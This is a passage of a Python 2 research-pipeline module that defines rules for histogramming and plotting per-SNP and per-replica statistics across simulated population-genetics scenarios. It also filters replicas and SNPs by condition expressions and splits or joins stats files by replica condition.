    only the last histogram's points survive -- confirm whether that is intended.
    """
    # ( if the bins of one are strictly finer than bins of other, i.e. if they form a DAG in this
    #  relationship, then we can still do the graph).
    histFiles = MakeSeq( histFiles )
    if not outFile:
        assert len( histFiles ) == 1
        outFile = ReplaceFileExt( histFiles[0], '.png' )
    # default labels: the bare file names of the histogram files
    if not labels: labels = [ os.path.splitext( os.path.basename( f ) )[0] for f in histFiles ]
    outFileTable = outFile + '.points.tsv'
    if getio: return dict( depends_on = histFiles, creates = ( outFile, outFileTable ),
                           mediumRuleNameSfx = sfx,
                           attrs = dict( piperun_short = True ) )
    pp.figure(1, figsize = (18,6) )
    #pp.clf()
    pp.subplots_adjust( bottom = 0.37 )
    pp.xlabel( xlabel + '\n\n\n\n' )
    pp.ylabel( ylabel )
    pp.hold( True )
    binSize = None
    theLabels = []
    theHandles = []
    for color, label, ( histFileNum, histFile ) in zip( colors, labels, enumerate( histFiles ) ):
        hist = Histogrammer.load( histFile )
        if coarsenBy: hist = hist.coarsenBy( coarsenBy )
        # all histograms must share the same bin size; dump the values before failing
        if not binSize: binSize = hist.binSize
        else:
            if not abs( hist.binSize - binSize ) < 1e-12:
                dbg( 'hist.binSize binSize hist.binSize-binSize' )
            assert abs( hist.binSize - binSize ) < 1e-12
        binLefts = hist.getBinLefts()
        if histFileNum == 0: pp.xticks( [ x for i, x in enumerate( binLefts ) if i % ticksCoarsen == 0 ] )
        binCounts = hist.getBinCounts( normed = normed, cumulative = True )
        rects = pp.plot( binLefts, binCounts, label = label, color = color )
        DotData( names = ( 'binLefts', 'binCounts' ), Columns = ( binLefts, binCounts ) ).saveToSV( outFileTable )
        if rects:
            theLabels.append( label )
            theHandles.append( rects )
    pp.title( title )
    if theLabels and theHandles:
        pp.figlegend( loc = 'lower center', labels = theLabels, handles = theHandles )
    if xbound: pp.gca().set_xbound( *xbound )
    if ybound: pp.gca().set_ybound( *ybound )
    pp.savefig( outFile )
def DefineRulesTo_histogramSnpStatistic( pr, Ddata,
                                         outFile, snpTables, snpStat, binSize,
                                         binShift = 0.0,
                                         scen2sfxs = lambda scen: '',
                                         scenCond = 'True',
                                         allScens = GetScenarios(),
                                         nreplicas = 100, thinSfx = '', replicaTables = (),
                                         replicaConds = 'True', replicaCondsSfxs = '',
                                         snpConds = 'True', snpCondsSfxs = '', title = '', titlePrefix = '',
                                         xlabel = '', ylabel = '',
                                         xbound = None, ybound = None, log = False, coarsenBy = None, sfx = '',
                                         ticksCoarsen = 1, cumulative = False, normed = False,
                                         colors = 'brcmygkbrcmygkbrcmygkbrcmygk',
                                         subplots_adjust = {},
                                         name = None ):
    """A generic way to plot the distribution of some per-snp statistics for some subset of SNPs.

    Defines three layers of rules: (1) one histogramSnpStatistic rule per
    (replicaCond, snpCond, scenario, scenSfx) combination; (2) one AddUpHistograms rule
    per (replicaCond, snpCond) summing across scenarios; (3) a single GraphHistograms
    rule plotting the totaled histograms.

    Params:
       statTable - the name of the per-snp statistics table.  we assume there is a file called
          Ddata/snpstats/scenDir/statTable_pop.tsv for each scenario.
       statCol - column name to histogram.

    Notes:
       - for histogramming should not need to load it all into memory.  can do a pre-pass to just get
       the range of values, define the bins, then do a second pass to count what goes in what bin.
       could also add bins as we go.  so, really just need to know bin size, and then can do all this
       with one pass.  can also, later, make this automatically parallelized.
       - Dict( '...' ) pulls named local variables from this frame; keep local names unchanged.
    """
    if not os.path.dirname( outFile ): outFile = os.path.join( Ddata, outFile )
    scenCondExpr = compile_expr( scenCond )
    # all of these accept either a single value or a sequence; normalize to sequences
    replicaConds = MakeSeq( replicaConds )
    replicaCondsSfxs = MakeSeq( replicaCondsSfxs )
    snpConds = MakeSeq( snpConds )
    snpCondsSfxs = MakeSeq( snpCondsSfxs )
    totaledHistFiles = []
    totaledLabels = []
    outFile = AddFileSfx( outFile, sfx )
    baseOutFile = outFile
    for replicaCond, replicaCondSfx in zip( replicaConds, replicaCondsSfxs ):
        for snpCond, snpCondSfx in zip( snpConds, snpCondsSfxs ):
            histFiles = []
            for scen in allScens:
                # only scenarios whose attributes satisfy scenCond get rules
                if not eval( scenCondExpr, globals(), ScenAttrs( scen ) ): continue
                scenDir = scen.scenDir()
                for scenSfx in MakeSeq( scen2sfxs( scen ) if callable( scen2sfxs ) else scen2sfxs[ scen ] ):
                    histOutFile = os.path.join( Ddata, 'hist', scenDir,
                                                AddFileSfx( ReplaceFileExt( os.path.basename( outFile ), '.tsv' ),
                                                            snpStat,
                                                            replicaCondSfx, snpCondSfx, scenSfx, sfx ) )
                    rule = pr.addInvokeRule( invokeFn = histogramSnpStatistic,
                                             invokeArgs =
                                             dict( outFile = histOutFile,
                                                   **Dict( 'Ddata thinSfx replicaTables replicaCond snpTables snpCond '
                                                           'snpStat nreplicas binSize binShift scenDir scenSfx sfx' ) ),
                                             name = name,
                                             comment = 'Compute distribution of ' + snpStat
                                             + ' for SNPs matching ' + snpCond + ' in replicas matching ' + replicaCond )
                    histFiles.append( histOutFile )
            # one summed histogram per (snpCond, replicaCond) pair, across all scenarios
            totaledHistFile = os.path.join( Ddata, 'hist',
                                            AddFileSfx( ReplaceFileExt( os.path.basename( outFile ), '.tsv' ),
                                                        snpCondSfx, replicaCondSfx, sfx ) )
            totaledHistFiles.append( totaledHistFile )
            totaledLabel = ''
            if replicaCondSfx:
                totaledLabel += replicaCondSfx + ' replicas' + ( (' (' + replicaCond + ') ') \
                                                                     if replicaCond != 'True' else '' )
            if snpCondSfx: totaledLabel += snpCondSfx + ' SNPs' + ( (' (' + snpCond + ') ') \
                                                                        if snpCond != 'True' else '' )
            totaledLabels.append( totaledLabel )
            pr.addInvokeRule( invokeFn = AddUpHistograms, invokeArgs = dict( histFiles = histFiles,
                                                                             outFile = totaledHistFile ),
                              mediumRuleNameSfx = ( sfx, snpStat, replicaCondSfx, snpCondSfx ), name = 'AddUpSnpHists',
                              fileDescrs = { 0:
                                                 ( 'Distribution of <b>' + snpStat + '</b> among '
                                                   + ( 'all SNPs' if snpCond == 'True'
                                                       else ' snps matching <em>' + snpCond + '</em>' )
                                                   + ' in '
                                                   + ( 'all replicas' if replicaCond == 'True' else
                                                       'replicas matching <em>' + replicaCond + '</em>' )
                                                   + ' in '
                                                   + ( 'all scenarios' if scenCond == 'True' else
                                                       'scenarios matching <em>' + scenCond + '</em>' ),
                                                   ( ( 'count', 'Number of SNPs with ' + snpStat + ' in given bin' ),) ) } )
    # build a default title/labels from the conditions, unless the caller supplied them
    if not title:
        title = 'Histogram of ' + snpStat + '\n'
        if scenCond != 'True': title += ' scenCond: ' + scenCond
        if any( replicaCond != 'True' for replicaCond in replicaConds ):
            title += ' replicaConds: ' + ', '.join(replicaCondsSfxs)
        if any( snpCond != 'True' for snpCond in snpConds ): title += ' snpConds: ' + ', '.join(snpCondsSfxs)
    title = titlePrefix + title
    if not ylabel: ylabel = ('#' if not normed else 'fraction') + ' of snps'
    if not xlabel: xlabel = snpStat
    pr.addInvokeRule( invokeFn = GraphHistograms,
                      mediumRuleNameSfx = (snpStat,) + tuple(replicaCondsSfxs) + tuple(snpCondsSfxs),
                      name = 'GraphSnpHists',
                      invokeArgs = dict( histFiles = totaledHistFiles, labels = totaledLabels,
                                         **Dict( 'xlabel ylabel title xbound ybound coarsenBy log outFile '
                                                 'cumulative normed ticksCoarsen colors' ) ),
                      attrs = Dict( 'snpStat replicaConds snpConds scenCond subplots_adjust' ) )
def DefineRulesTo_histogramReplicaStatistic( pr, Ddata,
                                             outFile, replicaStat, binSize,
                                             scenCond = 'True',
                                             replicaTables = None,
                                             sfx = '',
                                             scen2sfxs = lambda scen: '',
                                             allScens = tuple( GetScenarios() ),
                                             nreplicas = 100, thinSfx = '',
                                             replicaConds = 'True', replicaCondsSfxs = '',
                                             title = '', titlePrefix = '',
                                             xlabel = '', ylabel = '',
                                             xbound = None, ybound = None, log = False, coarsenBy = None,
                                             ticksCoarsen = 1, cumulative = False, normed = False,
                                             cumulativeUpTo = 0.99,
                                             subplots_adjust = {},
                                             name = None, nameSfx = '' ):
    """Define rules to plot the distribution of a specified per-replica statistic for some subsets of replicas
    in some subset of scenarios.

    Adds one histogramReplicaStatistic rule per replicaCond, then a GraphHistograms rule
    plotting all of them together.  Returns the list of totaled histogram files.

    Params:
       pr - the PipeRun object to which the rules should be added
       Ddata - the root folder of the genetic data in simulations format
       outFile - the filename to which the histogram plot will be written
       replicaTables - names of tables containing per-replica values.  For each such table T,
          there must be a file of the form os.path.join( Ddata, replicastats, scenario.scenDir(), T + '.tsv' )
          giving some values for each replica in the scenario.
       replicaStat - a Python expression in which the names in replicaTables may appear as variables, and refer
          to a named tuple representing the replica's row in the corresponding replicaTable.

    Notes:
       - for histogramming should not need to load it all into memory.  can do a pre-pass to just get
       the range of values, define the bins, then do a second pass to count what goes in what bin.
       could also add bins as we go.  so, really just need to know bin size, and then can do all this
       with one pass.  can also, later, make this automatically parallelized.
       - Dict( '...' ) pulls named local variables from this frame; keep local names unchanged.
    """
    if not os.path.dirname( outFile ): outFile = os.path.join( Ddata, outFile )
    scenCondExpr = compile_expr( scenCond )
    # restrict to scenarios whose attributes satisfy scenCond
    ourScens = [ scen for scen in allScens if eval( scenCondExpr, globals(), ScenAttrs( scen ) ) ]
    if callable( scen2sfxs ):
        scen2sfxs = dict( ( scen, scen2sfxs( scen ) ) for scen in ourScens )
    replicaConds = MakeSeq( replicaConds )
    replicaCondsSfxs = MakeSeq( replicaCondsSfxs )
    totaledHistFiles = []
    totaledLabels = []
    for replicaCond, replicaCondSfx in zip( replicaConds, replicaCondsSfxs ):
        # the per-cond suffix is appended inside histogramReplicaStatistic via AddFileSfx
        totaledHistFile = os.path.join( Ddata, 'hist',
                                        ReplaceFileExt( os.path.basename( outFile ), '.tsv' ) )
        totaledLabels.append( replicaCondSfx + ': ' + replicaCond )
        r = pr.addInvokeRule( invokeFn = histogramReplicaStatistic,
                              invokeArgs = Dict( 'Ddata thinSfx replicaTables replicaCond replicaStat nreplicas '
                                                 'binSize scenCond scen2sfxs allScens nameSfx sfx replicaCondSfx',
                                                 outFile = totaledHistFile ),
                              mediumRuleNameSfx = ( replicaStat, replicaCondSfx, sfx ),
                              fileDescrs = { 0:
                                                 ( 'Distribution of <b>' + replicaStat + '</b> among '
                                                   + ( 'all replicas' if replicaCond == 'True' else
                                                       'replicas matching <em>' + replicaCond + '</em>' )
                                                   + ' in '
                                                   + ( 'all scenarios' if scenCond == 'True' else
                                                       'scenarios matching <em>' + scenCond + '</em>' ),
                                                   ( ( 'count', 'Number of replicas with ' + replicaStat +
                                                       ' in given bin' ),
                                                     )) } )
        # the rule reports the actual (suffixed) histogram file it creates
        totaledHistFiles.append( r.creates[0] )
    if not title:
        if scenCond != 'True': title += ' scenCond: ' + scenCond
        if len( replicaConds ) == 1 and replicaConds[0] != 'True': title += ' replicaCond: ' + replicaConds[0]
    title = titlePrefix + title
    if not ylabel: ylabel = ('#' if not normed else 'fraction') + ' of replicas'
    if not xlabel: xlabel = replicaStat
    pr.addInvokeRule( invokeFn = GraphHistograms,
                      invokeArgs = dict( histFiles = totaledHistFiles, labels = totaledLabels,
                                         **Dict( 'xlabel ylabel title xbound ybound coarsenBy log outFile '
                                                 'sfx ticksCoarsen cumulative normed cumulativeUpTo' ) ),
                      name = 'GraphReplicaHists' + Sfx( nameSfx ),
                      mediumRuleNameSfx = ( replicaStat, sfx ) + tuple( replicaConds ),
                      attrs = Dict( 'replicaStat sfx subplots_adjust' ) )
    return totaledHistFiles
def identifyReplicasMeetingConds( Ddata, scenario, replicaTables, replicaConds, condsFileFN, nreplicas,
                                  thinSfx = '', getio = None ):
    """Given a list of named replica conditions, determine for each replica which conditions it meets, and
    write out the result in an easy-to-access format.

    Writes condsFileFN (placed under Ddata/replicastats<thinSfx>/<scenDir>/ when given as a
    bare name) with columns ( replicaNum, matchingConds, <one 0/1 column per condName> ),
    where matchingConds is a comma-joined list of the condition names the replica satisfies.

    Input params:

       replicaConds - sequence of pairs of the form ( condName, cond ) -- for example,
          ( ( 'hi', 'replicaStats.causalAlleleFreq >= .5' ), ( 'lo', 'replicaStats.causalAlleleFreq < .5' ) )
    """
    replicaTables = MakeSeq( replicaTables )
    replicaTableFiles = [ os.path.join( Ddata, 'replicastats' + thinSfx, scenario.scenDir(),
                                        replicaTable + ( '.tsv' if not os.path.splitext( replicaTable )[1] else '' ) )
                          for replicaTable in replicaTables ]
    if not os.path.dirname( condsFileFN ): condsFileFN = os.path.join( Ddata, 'replicastats' + thinSfx, scenario.scenDir(),
                                                                       condsFileFN )
    if getio: return dict( depends_on = replicaTableFiles, creates = condsFileFN, mediumRuleNameSfx = scenario.scenDir(),
                           attrs = dict( piperun_short = True,
                                         condNames = ', '.join( map( operator.itemgetter( 0 ), replicaConds ) ) ) )
    replicaTableVals = [ DotData( SVPath = f ) for f in replicaTableFiles ]
    # all per-replica tables must have exactly one row per replica
    assert all([ len( replicaTableVal ) == nreplicas for replicaTableVal in replicaTableVals ])
    matchingReplicas = []
    # evaluate each condition over the parallel rows of the replica tables; 1 = matched
    for replicaCond in map( operator.itemgetter( 1 ), replicaConds ):
        replicaCondExpr = compile_expr( replicaCond )
        replicasToUse = [ int( eval( replicaCondExpr, globals(), dict( zip( replicaTables, replicaTableRows ) ) ) )
                          for replicaTableRows in izip( *replicaTableVals ) ]
        matchingReplicas.append( replicasToUse )
    Records = []
    condNames = tuple( map( operator.itemgetter( 0 ), replicaConds ) )
    for replicaNum, condResults in enumerate( izip( *matchingReplicas ) ):
        Records.append( ( replicaNum, ','.join( replicaCondName for condNum, replicaCondName
                                                in enumerate( condNames )
                                                if condResults[ condNum ] ) )
                        + condResults )
    IDotData( names = ( 'replicaNum', 'matchingConds' ) + condNames, Records = Records ).save( condsFileFN )
def DefineRulesTo_identifyReplicasMeetingCommonConds( pr, Ddata, thinSfx = '', allScens = GetSelectionScenarios(),
                                                      nreplicas = 100 ):
    """Define rules to identify replicas meeting common conditions such as all/lo/hi freq.

    For each selection scenario, adds a rule writing commonReplicaConds.tsv that marks every
    replica as 'all', and as 'hi' or 'lo' depending on whether its causal allele frequency
    (from the replicaStats table) is >= .5 or < .5.

    NOTE: Dict( 'Ddata scenario ...' ) picks up the caller's locals by name, so the
    loop variable must stay named 'scenario'.
    """
    for scenario in allScens:
        pr.addInvokeRule( invokeFn = identifyReplicasMeetingConds,
                          invokeArgs = Dict( 'Ddata scenario nreplicas thinSfx',
                                             replicaTables = ( 'replicaStats', ),
                                             replicaConds = ( ( 'all', 'True' ),
                                                              ( 'hi', 'replicaStats.causalAlleleFreq >= .5' ),
                                                              ( 'lo', 'replicaStats.causalAlleleFreq < .5' ) ),
                                             condsFileFN = 'commonReplicaConds.tsv' ) )
def splitSnpStatsFile( Ddata, scenario, inFileFN, condsFileFN, condNames, thinSfx = '',
                       replicaColName = 'Chrom', sfx = '', getio = None ):
    """Split a file containing per-snp data for all replicas, into separate files containing the same data for each
    kind of replica.

    condsFileFN is a per-replica table (as written by identifyReplicasMeetingConds) with one
    0/1 column per condition name; each replica's rows from inFileFN are appended to the
    output file of every condition it satisfies.  Output file names are inFileFN with
    sfx and the condition name appended.  Requires inFileFN to be grouped by replicaColName
    in the same replica order as condsFileFN.
    """
    if not os.path.dirname( inFileFN ): inFileFN = os.path.join( Ddata, scenario.scenDir(), inFileFN )
    if not os.path.dirname( condsFileFN ):
        condsFileFN = os.path.join( Ddata, 'replicastats' + thinSfx, scenario.scenDir(), condsFileFN )
    outFileFNs = [ AddFileSfx( inFileFN, sfx, condName ) for condName in condNames ]
    if getio: return dict( depends_on = ( inFileFN, condsFileFN ),
                           creates = outFileFNs, mediumRuleNameSfx = scenario.scenDir() )
    condsFile = IDotData( condsFileFN )
    inFile = IDotData( inFileFN )
    # open all per-condition output files at once, with the input file's headings
    with contextlib.nested( *map( functools.partial( IDotData.openForWrite, headings = inFile.headings ),
                                  outFileFNs ) ) as outFiles:
        # walk the input one replica at a time, in lockstep with the conditions table
        for (replica, replicaRows), condValues in izip( inFile.groupby( replicaColName, multiPass = False ), condsFile ):
            assert condValues.replicaNum == replica
            # if this replica matches more than one condition, save the replica rows so we can iterate over them more
            # than once
            if sum( condValues[ condNames ] ) > 1: replicaRows = tuple( replicaRows )
            for condName, outFile in zip( condNames, outFiles ):
                if condValues[ condName ]: outFile.writeRecords( replicaRows )
def joinSnpStatsFiles( Ddata, scenario, outFileFN, condNames, condsFileFN, thinSfx = '',
                       replicaColName = 'Chrom', sfx = '', getio = None ):
    """Join several per-snp stats files, each containing data for some of the replicas,
    into a single file containing data for all the replicas.

    Inverse of splitSnpStatsFile: the input files are outFileFN with sfx and each condition
    name appended.  For each replica (in condsFileFN order) the rows are taken from the
    file of the FIRST condition the replica satisfies, so the output preserves replica order.
    """
    if not os.path.dirname( outFileFN ): outFileFN = os.path.join( Ddata, scenario.scenDir(), outFileFN )
    if not os.path.dirname( condsFileFN ): condsFileFN = os.path.join( Ddata, 'replicastats' + thinSfx, scenario.scenDir(),
                                                                       condsFileFN )
    inFileFNs = [ AddFileSfx( outFileFN, sfx, condName ) for condName in condNames ]
    if getio: return dict( depends_on = [ condsFileFN ] + inFileFNs, creates = outFileFN,
                           mediumRuleNameSfx = scenario.scenDir() )
    inFiles = map( IDotData, inFileFNs )
    dbg( 'inFiles' )
    condsFile = IDotData( condsFileFN )
    # one replica-group iterator per input file, advanced only when that file supplies a replica
    groupIters = [ inFile.groupby( replicaColName ) for inFile in inFiles ]
    def getBlocks():
        # yield each replica's row block, pulled from the first matching condition's file
        for r in condsFile:
            for condName, groupIter in zip( condNames, groupIters ):
                if r[ condName ]:
                    replicaNum, replicaRows = next( groupIter )
                    assert replicaNum == r.replicaNum
                    yield replicaRows
                    break
    IDotData.vstackFromIterable( getBlocks() ).save( outFileFN )
def ScenAttrs( scen ):
    """Make a dictionary describing the attributes of a scenario.

    Always contains 'scen', 'is_neutral' and 'isNeutral'; for selection scenarios it
    additionally carries the mutation age, population and frequency.  Used as the local
    namespace when evaluating scenario-condition expressions.
    """
    attrs = { 'scen': scen,
              'is_neutral': scen.is_neutral(),
              'isNeutral': scen.isNeutral() }
    if not scen.is_neutral():
        attrs[ 'mutAge' ] = scen.mutAge
        attrs[ 'mutPop' ] = scen.mutPop
        attrs[ 'mutFreq' ] = scen.mutFreq
    return attrs
def scatterPlotReplicaStatistic( Ddata, nreplicas, replicaStatX,
                                 replicaStatY,
                                 outFile,
                                 thinSfx = '',
                                 scenCond = 'True',
                                 replicaTables = (), replicaCond = 'True',
                                 replicaColorings = (),
                                 replicaDefaultColor = 'b',
                                 replicaShow = None,
                                 allScens = tuple( GetScenarios() ), nameSfx = '',
                                 scen2sfxs = {},
                                 title = '', subtitle = '',
                                 highlightScen = None, highlightReplica = None,
                                 xbound = None, ybound = None,
                                 getio = None ):
    """Draw a scatter plot where for each replica we have a pair of values.

    replicaStatX / replicaStatY are expressions over the per-replica tables; each point is
    one replica matching replicaCond in a scenario matching scenCond.  replicaColorings is a
    sequence of ( name, conditionExpr, color ) triples, applied in order -- the first matching
    condition colors the point, else replicaDefaultColor.  Each point's url encodes the
    scenario, replica number, both values and (optionally) replicaShow values.

    NOTE(review): nreplicas, subtitle, highlightScen/highlightReplica and nskipped are
    currently unused in the body -- presumably reserved for planned features; verify.
    """
    # Dict() pulls the named local variables from this frame -- keep these names unchanged
    args = Dict( 'Ddata thinSfx replicaTables scenCond scen2sfxs replicaCond allScens' )
    if getio: return dict( depends_on = findReplicasMatchingConds( getio = True, **args )[ 'depends_on' ],
                           creates = outFile,
                           name = 'scatterPlotReplicaStatistic' + Sfx( nameSfx ),
                           mediumRuleNameSfx = ( replicaStatX, replicaStatY ), attrs = dict( piperun_short = True ) )
    x = []
    y = []
    urls = []
    nskipped = 0
    colors = []
    # when replicaShow is a sequence of expressions, build one expression that joins their
    # values with '_' (floats rendered with 2 decimals) for inclusion in each point's url
    if IsSeq( replicaShow ): replicaShow = '"_".join(map(str,["%.2f" % v if isinstance(v,float) else v for v in (' + ','.join( map( str, replicaShow ) ) + ')]))'
    for r in findReplicasMatchingConds( showHeadings = ( 'valX', 'valY', 'valShow' ) + tmap( operator.itemgetter( 0 ),
                                                                                             replicaColorings ),
                                        showVals = ( replicaStatX, replicaStatY,
                                                     replicaShow if replicaShow is not None else '0' ) +
                                        tmap( operator.itemgetter( 1 ), replicaColorings ),
                                        **args ):
        x.append( r.valX )
        y.append( r.valY )
        urls.append( '%s_%d_x=%s_y=%s' % ( r.scenario, r.replicaNum,
                                           '%.2f' % r.valX if isinstance( r.valX, float ) else r.valX,
                                           '%.2f' % r.valY if isinstance( r.valY, float ) else r.valY ) +
                     ( ( '' if str( r.valShow).startswith('_') else '_' ) + str( r.valShow ) if replicaShow else '' ) )
        if replicaColorings:
            # first coloring whose condition holds for this replica wins
            colorHere = None
            for name, cond, color in replicaColorings:
                if r[ name ]:
                    colorHere = color
                    break
            colors.append( colorHere if colorHere is not None else replicaDefaultColor )
    pp.scatter( **Dict( 'x y urls', c = colors if colors else 'b' ) )
    pp.axis( 'equal' )
    if xbound: pp.gca().set_xbound( *xbound )
    if ybound: pp.gca().set_ybound( *ybound )
    if not xbound and not ybound:
        # draw the y = x diagonal over the data range, as a visual reference
        start = min( min(x), min(y) )
        rng = max( max( x ) - min( x ), max(y) - min(y) )
        pp.plot( [ start, start+rng ], [ start, start+rng ], 'g--' )
    pp.xlabel( replicaStatX )
    pp.ylabel( replicaStatY )
    if title: pp.title( title )
    pp.savefig( outFile )
def findTableFiles( Ddata, thinSfx, whichStats, tables, scenCond, allScens, scen2sfxs ):
    """Return table files used in conditions.

    For every scenario satisfying scenCond, maps each table name to its file under
    Ddata/<whichStats><thinSfx>/<scenDir>/ (applying any scenario- or table-specific
    suffix from scen2sfxs; '.data' tables are directory-backed and get a trailing slash).

    Returns a 5-tuple:
       tableNames      - the table names with extensions stripped
       tables          - the normalized input table names
       ourScens        - scenarios matching scenCond
       scen2table2file - { scenario : { table : file } }
       depends_on      - flat list of all table files, for rule dependency declarations
    """
    tables = MakeSeq( tables )
    scen2sfxs = dict( scen2sfxs )
    scenCondExpr = compile_expr( scenCond )
    ourScens = [ scen for scen in allScens if eval( scenCondExpr, globals(), ScenAttrs( scen ) ) ]
    depends_on = []
    scen2table2file = {}
    for scen in ourScens:
        thisScenDict = {}
        for table in tables:
            # identify the scenario-specific suffix for this table
            scenSfx = DictGet( scen2sfxs, scen, '' )
            if scenSfx:
                if IsSeq( scenSfx ): scenSfx = dict( scenSfx )
                # a non-string suffix maps individual table names (sans extension) to suffixes
                if not isinstance( scenSfx, types.StringTypes ): scenSfx = DictGet( dict( scenSfx ),
                                                                                    os.path.splitext( table )[0], '' )
            tableFile = os.path.join( Ddata, whichStats+ thinSfx, scen.scenDir(),
                                      AddFileSfx( table + ( '.tsv' if '.' not in table else '' ),
                                                  scenSfx )
                                      + ( '/' if table.endswith( '.data' ) else '' ) )
            depends_on.append( tableFile )
            thisScenDict[ table ] = tableFile
        scen2table2file[ scen ] = thisScenDict
    tableNames = map( operator.itemgetter( 0 ), map( os.path.splitext, tables ) )
    return tableNames, tables, ourScens, scen2table2file, depends_on
def FindChromCol( iDotData ):
    """Find the column representing the replica or chromosome, based on our conventions.

    Preference order is 'replicaNum', then 'Chrom'; 'chrom' is the fallback (returned
    even when absent from the headings).
    """
    for candidate in ( 'replicaNum', 'Chrom' ):
        if candidate in iDotData.headings:
            return candidate
    return 'chrom'
def FindPosCol( iDotData ):
    """Find the column representing the SNP position, based on our conventions.

    Returns 'Pos' when present among the headings; otherwise falls back to 'pos'.
    """
    if 'Pos' in iDotData.headings:
        return 'Pos'
    return 'pos'
class NameCollector(ast.NodeVisitor):
    """Gather the identifiers (ast.Name nodes) used in an expression."""

    def __init__(self):
        # identifiers recorded so far, in visit order; may contain duplicates
        self.names = []

    def visit_Name(self, node):
        """Record each identifier node encountered during the traversal."""
        self.names.append(node.id)

    @staticmethod
    def getNamesIn(expr):
        """Parse *expr* and return the distinct identifiers it references, as a tuple."""
        collector = NameCollector()
        collector.visit(ast.parse(expr))
        return tuple(set(collector.names))
def FindTables( *exprs ):
    """Find tables referenced in specified expressions.

    Parses each expression and returns, as a tuple (in arbitrary order), the distinct
    identifiers used in any of them, minus the literals 'True' and 'False'.

    Unlike the previous reduce()-based implementation, this handles being called with
    zero expressions (returns an empty tuple instead of raising TypeError), and does
    not depend on the Python-2-only builtin reduce().
    """
    names = set()
    for expr in exprs:
        # NameCollector.getNamesIn returns the identifiers appearing in one expression
        names.update( NameCollector.getNamesIn( expr ) )
    return tuple( names - set( ( 'True', 'False' ) ) )
def findReplicasMatchingConds( Ddata,
                               replicaTables = None, replicaCond = 'True',
                               outFile = None,
                               scenCond = 'True',
                               showHeadings = (),
                               showVals = (),
                               allScens = GetScenarios(),
                               scen2sfxs = {},
                               thinSfx = '',
                               getio = None ):
  """Make an IDotData containing specified per-replica values for replicas meeting specified conditions.

  Params:

     Ddata - root data directory
     replicaTables - replicastats tables referenced by replicaCond and showVals; if None,
        the table names are inferred from those expressions via FindTables()
     replicaCond - Python expression, evaluated with the per-replica table rows as locals,
        deciding whether a replica is included
     outFile - if given, also save the result to this file
     scenCond - Python expression selecting which scenarios to process
     showHeadings - output column headings for showVals; defaults to alphanumericized
        showVals, with duplicates disambiguated by a numeric suffix
     showVals - Python expressions whose per-replica values are written to the output
     allScens - scenarios to consider (NOTE(review): default is evaluated once at def time)
     scen2sfxs - map from scenario to scenario-specific table-file suffix
     thinSfx - suffix identifying a thinned version of the data
     getio - if true, just return this rule's inputs/outputs (pipeline support)

  Returns an IDotData with columns ( scenario, replicaNum, *showHeadings ), one row per
     replica satisfying replicaCond.
  """
  dbg( '"findReplicasMatchingConds" scenCond replicaTables replicaCond showHeadings showVals scen2sfxs' )
  # infer the needed replicastats tables from the expressions, if not given explicitly
  if replicaTables is None: replicaTables = FindTables( replicaCond, *MakeSeq( showVals ) )
  replicaTables = tuple( set( MakeSeq( replicaTables ) ) )
  # locate the per-scenario table files and the scenarios passing scenCond;
  # Dict('...') captures the like-named locals from this frame
  replicaTableNames, replicaTables, ourScens, scen2table2file, depends_on = \
      findTableFiles( whichStats = 'replicastats', tables = replicaTables,
                      **Dict( 'Ddata thinSfx scenCond allScens scen2sfxs' ) )
  if getio: return dict( depends_on = depends_on,
                         creates = outFile,
                         attrs = dict( piperun_short = True ) )
  replicaCondExpr = compile_expr( replicaCond )
  showVals = MakeSeq( showVals )
  # NOTE(review): showValsExpr is re-used for every replica below, which relies on
  # Python 2 map() returning a list rather than a one-shot iterator.
  showValsExpr = map( compile_expr, showVals )
  if not showHeadings:
    showHeadings = map( MakeAlphaNum, showVals )
  # disambiguate duplicate headings by appending a numeric suffix
  showHeadings2 = []
  for h in showHeadings:
    h_new = h
    i = 1
    while h_new in showHeadings2:
      h_new = h + Sfx( i )
      i += 1
    showHeadings2.append( h_new )
  showHeadings = showHeadings2
  def makeResult():
    # generator producing the output rows; wrapped in an IDotData below
    yield ( 'scenario', 'replicaNum' ) + tuple( MakeSeq( showHeadings ) )
    numReplicasSkippedTot, numReplicasAllowedTot = 0, 0
    for scen in ourScens:
      logging.info( '"findReplicasMatchingConds" scen' )
      numReplicasSkipped, numReplicasAllowed = 0, 0
      thisScenDict = scen2table2file[ scen ]
      replicaTableVals = [ IDotData( thisScenDict[ replicaTable ] ) for replicaTable in replicaTables ]
      # inner-join the replica tables on their replica/chromosome column, so each
      # iteration sees the matching row from every table at once
      for replicaTableRows in \
            IDotData.TableIterInnerJoinAuxAsTuples( tableIters = map( iter, replicaTableVals ),
                                                    cols = map( FindChromCol, replicaTableVals ),
                                                    blanks = ( None, ) * len( replicaTableVals ),
                                                    headingLens = map( IDotData.rootClass.numCols,
                                                                       replicaTableVals ) ):
        # expose each table's current row under the table's name when evaluating the exprs
        vdict = dict( zip( replicaTableNames, replicaTableRows ) )
        dbg( 'scen vdict' )
        evalHere = lambda expr: eval( expr, globals(), vdict )
        if evalHere( replicaCondExpr ):
          numReplicasAllowed += 1
          yield [ scen.scenName(), replicaTableRows[0].replicaNum ] + map( evalHere, showValsExpr )
        else:
          numReplicasSkipped += 1
      dbg( '"in_scenario" scen numReplicasSkipped numReplicasAllowed' )
      numReplicasSkippedTot += numReplicasSkipped
      numReplicasAllowedTot += numReplicasAllowed
    dbg( 'numReplicasSkippedTot numReplicasAllowedTot' )
  r = IDotData.fromFn( makeResult )
  if outFile: r.save( outFile )
  return r
def findSnpsMatchingConds( Ddata,
                           snpTables = (), snpCond = 'True', replicaTables = (), replicaCond = 'True',
                           outFile = None,
                           scenCond = 'True',
                           showHeadings = (),
                           showVals = (),
                           allScens = GetScenarios(),
                           scen2sfxs = {},
                           thinSfx = '',
                           getio = None ):
  """Make an IDotData containing specified per-replica values for SNPs meeting specified conditions in
  replicas meeting specified conditions.

  Params:

     Ddata - root data directory
     snpTables - snpStats tables referenced by snpCond and showVals
     snpCond - Python expression, evaluated with the per-SNP table rows as locals,
        deciding whether a SNP is included
     replicaTables, replicaCond - passed to findReplicasMatchingConds() to restrict
        which replicas are considered at all
     outFile - if given, also save the result to this file
     scenCond - Python expression selecting which scenarios to process
     showHeadings - output column headings for showVals; defaults to alphanumericized showVals
     showVals - Python expressions whose per-SNP values are written to the output
     allScens - scenarios to consider (NOTE(review): default is evaluated once at def time)
     scen2sfxs - map from scenario to scenario-specific table-file suffix
     thinSfx - suffix identifying a thinned version of the data
     getio - if true, just return this rule's inputs/outputs (pipeline support)

  Returns an IDotData with columns ( scenario, replicaNum, Pos, *showHeadings ), one row
     per SNP satisfying snpCond within a replica satisfying replicaCond.
  """
  snpTables = tuple( set( MakeSeq( snpTables ) ) )
